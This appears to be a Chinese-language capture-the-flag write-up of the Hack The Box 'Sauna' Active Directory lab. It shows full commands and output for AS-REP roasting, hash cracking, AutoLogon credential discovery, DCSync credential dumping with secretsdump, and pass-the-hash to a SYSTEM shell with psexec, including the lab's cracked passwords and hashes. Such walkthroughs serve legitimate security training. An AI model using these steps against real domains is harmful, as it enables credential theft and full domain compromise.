HTB打靶(Active Directory 101 Sauna)_htb sauna

nmap信息收集

nmap -A -T4 10.10.10.175
Nmap scan report for 10.10.10.175
Host is up (0.39s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2022-12-27 12:35:38Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: WAP|phone
Running: Linux 2.4.X|2.6.X, Sony Ericsson embedded
OS CPE: cpe:/o:linux:linux_kernel:2.4.20 cpe:/o:linux:linux_kernel:2.6.22 cpe:/h:sonyericsson:u8i_vivaz
OS details: Tomato 1.28 (Linux 2.4.20), Tomato firmware (Linux 2.6.22), Sony Ericsson U8i Vivaz mobile phone
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_smb2-time: Protocol negotiation failed (SMB2)

TRACEROUTE (using port 53/tcp)
HOP RTT    ADDRESS
1   ... 30

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 200.45 seconds
发现是域控主机并且开放80端口,思路检查SMB共享查看网站以及使用windapsearch检查ldap是否可以匿名绑定,暂不考虑CVE。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35

dirsearch扫描网站

dirsearch -u 10.10.10.175

_|. _ _  _  _  _ _|_    v0.4.2                                                                                                                         
(_||| _) (/_(_|| (_| )                                                                                                                                  
                                                                                                                                                        
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927

Output File: /home/kali/.dirsearch/reports/10.10.10.175_22-12-28_09-36-30.txt

Error Log: /home/kali/.dirsearch/logs/errors-22-12-28_09-36-30.log

Target: http://10.10.10.175/

[09:36:33] Starting: 
[09:36:40] 403 -  312B  - /%2e%2e//google.com                              
[09:38:28] 403 -  312B  - /\..\..\..\..\..\..\..\..\..\etc\passwd           
[09:38:36] 200 -   30KB - /about.html                                       
[09:39:55] 200 -   15KB - /contact.html                                     
[09:40:01] 301 -  147B  - /css  ->  http://10.10.10.175/css/                
[09:40:24] 301 -  149B  - /fonts  ->  http://10.10.10.175/fonts/            
[09:40:40] 301 -  150B  - /images  ->  http://10.10.10.175/images/          
[09:40:40] 403 -    1KB - /images/                                          
[09:40:47] 200 -   32KB - /index.html                                       
                                                                            
Task Completed                   

查看页面发现有团队介绍信息                                                                                                                        
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27

smbclient检查SMB匿名共享

smbclient -L \\\\10.10.10.175 -N
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.175 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
可以访问但是没有内容
1
2
3
4
5
6
7
8
9

windapsearch检查ladp匿名绑定

windapsearch安装
https://github.com/Mephostophiles/windapsearch
pip install python-ldap #or apt-get install python-ldap
如果安装python-ldap报错
apt-get update
apt-get install libsasl2-dev python3-dev libldap2-dev libssl-dev

python3 windapsearch.py -d egotistical-bank.local --dc-ip 10.10.10.175 -
U
[+] No username provided. Will try anonymous bind.
[+] Using Domain Controller at: 10.10.10.175
[+] Getting defaultNamingContext from Root DSE
[+]     Found: DC=EGOTISTICAL-BANK,DC=LOCAL
[+] Attempting bind
[+]     ...success! Binded as:
[+]      None

[+] Enumerating all AD users

[*] Bye!
匿名绑定失败
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21

思路分析

通过上面的信息发现开放的网站存在团队信息,这里尝试使用团队名称进行爆破使用Username Anarchy工具
下载:
    https://github.com/urbanadventurer/username-anarchy
1
2
3

Username Anarchy使用

下载:
    https://github.com/urbanadventurer/username-anarchy
name内容:
    Fergus Smith
    Shaun Coins
    Hugo Bear
    Bowie Taylor
    Steven Kerb
命令:
    ./username-anarchy --input-file /home/kali/桌面/Suan/name --select-format first,flast,first.last,firstl >uname.t
    xt
 生成内容:
        fergus
        fergus.smith
        ferguss
        fsmith
        shaun
        shaun.coins
        shaunc
        scoins
        hugo
        hugo.bear
        hugob
        hbear
        bowie
        bowie.taylor
        bowiet
        btaylor
        steven
        steven.kerb
        stevenk
        skerb
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32

使用GetNPUser爆破尝试获取TGT hash（需要关闭域的预认证）

命令:
    while read p; do python3 GetNPUsers.py egotistical-bank.local/"$p" -request -no-pass -dc-ip 10.10.10.175 >>hash.txt; done < /home/kali/桌面/AD/username-anarchy-master/uname.txt
 hash.txt(结果)
    Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

    [*] Getting TGT for fergus
    [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
    Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

    [*] Getting TGT for fergus.smith
    [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
    Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

    [*] Getting TGT for ferguss
    [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
    Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

    [*] Getting TGT for fsmith
    $krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:c879c201ffc6450da458df490d972758$6253b915d0d5f2fa1a46bee89cbd29b4a862d61c9384b23b4dd2b0dc17a399b33b12b34e18708401337002de7b8c9dbb77c622e11f7b8ee4d7af04a4973e4455a74fe0bad5127523c1169f05f5bb2c2e30f60f47ab452872b59428dad9f1b4eca6f059e25f210267d531048ae9ec433512c0f9a22dcf4d91a14fc6ee4a0d3a2393d31234c3cf89ee6a26a62421b914ea94dd47468a66c6e861ed091e5f67693e6c713240200fb736780825f1ffeb996ca4c215ee46c89768bb9c67eef173eb7a6de344ad97aa9cccb9691999d13d05fcf856074bcf8f391a9433f7de5dc355ad80016362c6e3b88cd7ac12e548fe4bcadf09a296367c063d27553a91c13a0e9c
    Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

    [*] Getting TGT for shaun
    [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
    Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

    [*] Getting TGT for shaun.coins
    [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
    Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

    [*] Getting TGT for shaunc
    [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
    Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

    [*] Getting TGT for scoins
    [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
    Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

    [*] Getting TGT for hugo
    [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
    Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

    [*] Getting TGT for hugo.bear
    [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
    Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

    [*] Getting TGT for hugob
    [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
    Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

    [*] Getting TGT for hbear
    [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
    Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

    [*] Getting TGT for bowie
    [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
    Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

    [*] Getting TGT for bowie.taylor
    [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
    Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

    [*] Getting TGT for bowiet
    [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
    Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

    [*] Getting TGT for btaylor
    [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
    Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

    [*] Getting TGT for steven
    [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
    Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

    [*] Getting TGT for steven.kerb
    [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
    Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

    [*] Getting TGT for stevenk
    [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
    Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

    [*] Getting TGT for skerb
    [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
    发现fsmith账号成功获取TGT hash
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84

使用HashCat进行爆破

18200进行解密目的是进行ASREPRoasting攻击:
        hashcat --help | grep Kerberos
    19600 | Kerberos 5, etype 17, TGS-REP
        | Network Protocol
    19800 | Kerberos 5, etype 17, Pre-Auth
        | Network Protocol
    19700 | Kerberos 5, etype 18, TGS-REP
        | Network Protocol
    19900 | Kerberos 5, etype 18, Pre-Auth
        | Network Protocol
    7500 | Kerberos 5, etype 23, AS-REQ Pre-Auth
        | Network Protocol
    13100 | Kerberos 5, etype 23, TGS-REP
        | Network Protocol
    18200 | Kerberos 5, etype 23, AS-REP
        | Network Protocol
hash.txt:
    $krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:c879c201ffc6450da458df490d972758$6253b915d0d5f2fa1a46bee89cbd29b4a862d61c9384b23b4dd2b0dc17a399b33b12b34e18708401337002de7b8c9dbb77c622e11f7b8ee4d7af04a4973e4455a74fe0bad5127523c1169f05f5bb2c2e30f60f47ab452872b59428dad9f1b4eca6f059e25f210267d531048ae9ec433512c0f9a22dcf4d91a14fc6ee4a0d3a2393d31234c3cf89ee6a26a62421b914ea94dd47468a66c6e861ed091e5f67693e6c713240200fb736780825f1ffeb996ca4c215ee46c89768bb9c67eef173eb7a6de344ad97aa9cccb9691999d13d05fcf856074bcf8f391a9433f7de5dc355ad80016362c6e3b88cd7ac12e548fe4bcadf09a296367c063d27553a91c13a0e9c
命令:
    hashcat -m 18200 hash.txt -o pass.txt /usr/share/wordlists/rockyou.txt --force
pass.txt:
    $krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:c879c201ffc6450da458df490d97275
    8$6253b915d0d5f2fa1a46bee89cbd29b4a862d61c9384b23b4dd2b0dc17a399b33b12b34e1
    8708401337002de7b8c9dbb77c622e11f7b8ee4d7af04a4973e4455a74fe0bad5127523c116
    9f05f5bb2c2e30f60f47ab452872b59428dad9f1b4eca6f059e25f210267d531048ae9ec433
    512c0f9a22dcf4d91a14fc6ee4a0d3a2393d31234c3cf89ee6a26a62421b914ea94dd47468a
    66c6e861ed091e5f67693e6c713240200fb736780825f1ffeb996ca4c215ee46c89768bb9c6
    7eef173eb7a6de344ad97aa9cccb9691999d13d05fcf856074bcf8f391a9433f7de5dc355ad
    80016362c6e3b88cd7ac12e548fe4bcadf09a296367c063d27553a91c13a0e9c:Thestrokes23
    获得密码:Thestrokes23
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30

使用evil-winrm登录并进行Bloodhound信息收集

命令:evil-winrm -i 10.10.10.175 -u fsmith -p 'Thestrokes23'
获取user flag:cat C:\Users\FSmith\Desktop\user.txt
准备winPEASant进行自动提权
下载:
    https://github.com/carlospolop/PEASS-ng
evil-winrm shell:
上传:winPEASant进行自动提权
    upload /home/kali/Suan/winPEASany.exe
运行:   
    .\winPEASany.exe
        [1;36mÉÍÍÍÍÍÍÍÍÍ͹ [1;32mHome folders found[0m
        [1;32m    C:\Users\Administrator[0m
        [1;32m    C:\Users\All Users[0m
        [1;32m    C:\Users\Default[0m
        [1;32m    C:\Users\Default User[0m
        [1;31m    C:\Users\FSmith : FSmith [AllAccess][0m
        [1;32m    C:\Users\Public[0m
        [1;32m    C:\Users\svc_loanmgr[0m

        [1;36mÉÍÍÍÍÍÍÍÍÍ͹ [1;32mLooking for AutoLogon credentials[0m
        [1;31m    Some AutoLogon credentials were found[0m
            DefaultDomainName             :  [0m[1;35mEGOTISTICALBANK[0m
            DefaultUserName               :  [0m[1;35mEGOTISTICALBANK[0m\svc_loanmanager
            DefaultPassword               :  Moneymakestheworldgoround!

        [1;36mÉÍÍÍÍÍÍÍÍÍ͹ [1;32mPassword Policies[0m
        [1;36mÈ [1;34mCheck for a possible brute-force [1;33m[0m
        [1;37m    Domain: [0mBuiltin
        [1;37m    SID: [0mS-1-5-32
        [1;37m    MaxPasswordAge: [0m42.22:47:31.7437440
        [1;37m    MinPasswordAge: [0m00:00:00
        [1;37m    MinPasswordLength: [0m0
        [1;37m    PasswordHistoryLength: [0m0
        [1;37m    PasswordProperties: [0m0
        [1;90m   =================================================================================================[0m
    发现登录过得凭据:
        user:svc_loanmanager
        password:Moneymakestheworldgoround

     登录机器:
        evil-winrm -i 10.10.10.175 -u svc_loanmgr -p 'Moneymakestheworldgoround!'   
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41

使用BloodHound分析域

    evil-winrm shell:
        upload /home/kali/temp/SharpHound.exe
        ./SharpHound.exe -c all
    安装bloodhound:
            pip install pycrypto			//环境库
            pip install bloodhound			//采集器
            apt install bloodhound			//本体
            sudo apt install default-jre	//安装最新java非必须
    启动bloodhound
            neo4j start
            http://localhost:7474
            neo4j/neo4j 默认账号密码
            kali工具包中启动bloodhound
    执行Find Principals with DCSync Rights查询,发现svc_loanmanager可以进行Dcsync攻击
1
2
3
4
5
6
7
8
9
10
11
12
13
14

Dcsync攻击

    命令1:
    python3 secretsdump.py svc_loanmgr@10.10.10.175
    Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

    Password:
    [-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
    [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
    [*] Using the DRSUAPI method to get NTDS.DIT secrets
    Administrator:500:aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e:::
    Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
    krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::
    EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
    EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
    EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c:::
    SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:198e4852fcc60c3adf1749d69e2fdd24:::
    [*] Kerberos keys grabbed
    Administrator:aes256-cts-hmac-sha1-96:42ee4a7abee32410f470fed37ae9660535ac56eeb73928ec783b015d623fc657
    Administrator:aes128-cts-hmac-sha1-96:a9f3769c592a8a231c3c972c4050be4e
    Administrator:des-cbc-md5:fb8f321c64cea87f
    krbtgt:aes256-cts-hmac-sha1-96:83c18194bf8bd3949d4d0d94584b868b9d5f2a54d3d6f3012fe0921585519f24
    krbtgt:aes128-cts-hmac-sha1-96:c824894df4c4c621394c079b42032fa9
    krbtgt:des-cbc-md5:c170d5dc3edfc1d9
    EGOTISTICAL-BANK.LOCAL\HSmith:aes256-cts-hmac-sha1-96:5875ff00ac5e82869de5143417dc51e2a7acefae665f50ed840a112f15963324
    EGOTISTICAL-BANK.LOCAL\HSmith:aes128-cts-hmac-sha1-96:909929b037d273e6a8828c362faa59e9
    EGOTISTICAL-BANK.LOCAL\HSmith:des-cbc-md5:1c73b99168d3f8c7
    EGOTISTICAL-BANK.LOCAL\FSmith:aes256-cts-hmac-sha1-96:8bb69cf20ac8e4dddb4b8065d6d622ec805848922026586878422af67ebd61e2
    EGOTISTICAL-BANK.LOCAL\FSmith:aes128-cts-hmac-sha1-96:6c6b07440ed43f8d15e671846d5b843b
    EGOTISTICAL-BANK.LOCAL\FSmith:des-cbc-md5:b50e02ab0d85f76b
    EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes256-cts-hmac-sha1-96:6f7fd4e71acd990a534bf98df1cb8be43cb476b00a8b4495e2538cff2efaacba
    EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes128-cts-hmac-sha1-96:8ea32a31a1e22cb272870d79ca6d972c
    EGOTISTICAL-BANK.LOCAL\svc_loanmgr:des-cbc-md5:2a896d16c28cf4a2
    SAUNA$:aes256-cts-hmac-sha1-96:932378bcf41465a18bd8d962d3d3540f2b1ef055a7607a802134070b068ca61d
    SAUNA$:aes128-cts-hmac-sha1-96:b3860c7da6be8d0e8058f32cf7b9f13b
    SAUNA$:des-cbc-md5:b926fb9e850e753b
    [*] Cleaning up...

    命令2:python3 secretsdump.py egotistical-bank.local/svc_loanmgr@10.10.10.175 -just-dc-user Administrator
    c-user Administrator
    Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

    Password:
    [*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
    [*] Using the DRSUAPI method to get NTDS.DIT secrets
    Administrator:500:aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e:::
    [*] Kerberos keys grabbed
    Administrator:aes256-cts-hmac-sha1-96:42ee4a7abee32410f470fed37ae9660535ac56eeb73928ec783b015d623fc657
    Administrator:aes128-cts-hmac-sha1-96:a9f3769c592a8a231c3c972c4050be4e
    Administrator:des-cbc-md5:fb8f321c64cea87f
    [*] Cleaning up...

    命令1或命令2都可以获取administrator hash
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51

使用psexec获取shell

 使用impacket/examples/psexec.py进行操作
 命令1:python3 psexec.py egotistical-bank.local/administrator@10.10.10.175 -hashes aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e
 命令2:python3 psexec.py administrator@10.10.10.175 -hashes aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e
 命令1和命令2都行
    Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

    [*] Requesting shares on 10.10.10.175.....
    [*] Found writable share ADMIN$
    [*] Uploading file KxkWXTww.exe
    [*] Opening SVCManager on 10.10.10.175.....
    [*] Creating service gHaE on 10.10.10.175.....
    [*] Starting service gHaE.....
    [!] Press help for extra shell commands
    Microsoft Windows [Version 10.0.17763.973]
    (c) 2018 Microsoft Corporation. All rights reserved.

    C:\Windows\system32>
获取System flag:
type C:\Users\Administrator\Desktop\root.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19

总结:

使用nmap扫描发现目标机器是域控机器且开放了80端口,尝试进行ldap匿名绑定失败,使用dirsearch扫描网站发现有联系人页面,
打开联系人页面用Username Anarchy生成团队爆破名称,nmap获取的域名+团队名称进行GetNPUser进行爆破,发现fsmith账号成功,
使用hashcat破解出密码,evil-winrm登录目标机器使用winPEASant进行自动提权发现svc_loanmgr账号密码,使用BloodHound分析域
寻找可以进行Dcsync的账号发现svc_loanmgr可以进行Dcsync,使用secretsdump进行Dcsync成功拿到administrator TGT hash,使用
psexec进行pth攻击获取System 权限。
工具:
nmap
dirsearch
smbclient
windapsearch
GetNPUser   impacket
hashcat
evil-winrm
BloodHound
secretsdump impacket
psexec  impacket
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16